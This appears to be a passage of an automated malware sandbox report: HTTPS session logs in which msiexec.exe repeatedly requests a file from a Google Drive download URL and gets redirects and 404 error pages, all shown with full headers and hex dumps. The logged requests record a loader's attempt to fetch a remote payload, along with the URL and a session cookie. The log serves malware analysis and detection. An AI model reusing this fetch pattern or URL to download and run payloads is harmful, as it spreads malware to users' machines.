                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-4NWHBiN16P_MAPmSbWEl_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.1149991142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:13 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:13 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgS4K3v691dd15FpeR0vPdjYpFmI3fYVqbjwMi7_88B_fX5in2LrIy0viCt5adCHf4lT
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:13 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce-q-qllZzet6PSwiZDCbNzUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:13 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 37 5f 6b 31 49 6c 4f 6a 73 68 37 71 61 33 45 66 63 48 77 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H7_k1IlOjsh7qa3EfcHwvA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.1149992142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:14 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:14 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:14 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-FYslEcD73Is21xJauuVgCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.1149993142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:15 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:16 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQxSg3cPI-AKBTmkLkAE35CTiipc2INTbwpvf5tQnLFX9D99ewl6NbwCaUvMQASXCFw0luVYNw
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:15 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-RSO5_EGf8vY3h2WN5sK5iQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 72 57 41 35 65 73 4a 54 6f 55 6d 47 7a 6e 64 65 6c 53 6a 79 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MrWA5esJToUmGzndelSjyw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.1149994142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:16 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:17 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:17 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-_3fzHTyvBxOl5TaUpzpR2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.1149995142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:17 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:18 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgT8nGpbmcG2OB-TbH9dBcdmOKT13tDd1ykyQCQX_rR0T10xFVBQu351kDdIUoquXhDD
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:18 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-UJ88aMND4j4t6XqBeWzMGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 44 54 64 4f 75 79 6a 53 4f 42 79 41 73 4e 4e 43 42 36 6f 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6DTdOuyjSOByAsNNCB6olQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.1149997142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:19 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:19 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:19 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-uCUJF8DDaHIzAbNtcFK9pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.1149998142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:20 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:20 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQ0wwe0MIGr6svzc_2bDbviQSEq6AMiE5rdXxCVwnAEoc1AmvHseanm6LvjqkIFBMmCV0gumwg
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:20 GMT
                                                                Content-Security-Policy: script-src 'nonce--leIgwePYLAne0ioj4VpRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:20 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 4b 46 35 33 49 30 4e 6d 6b 37 64 30 69 63 75 75 54 44 4a 51 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fKF53I0Nmk7d0icuuTDJQQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.1149999142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
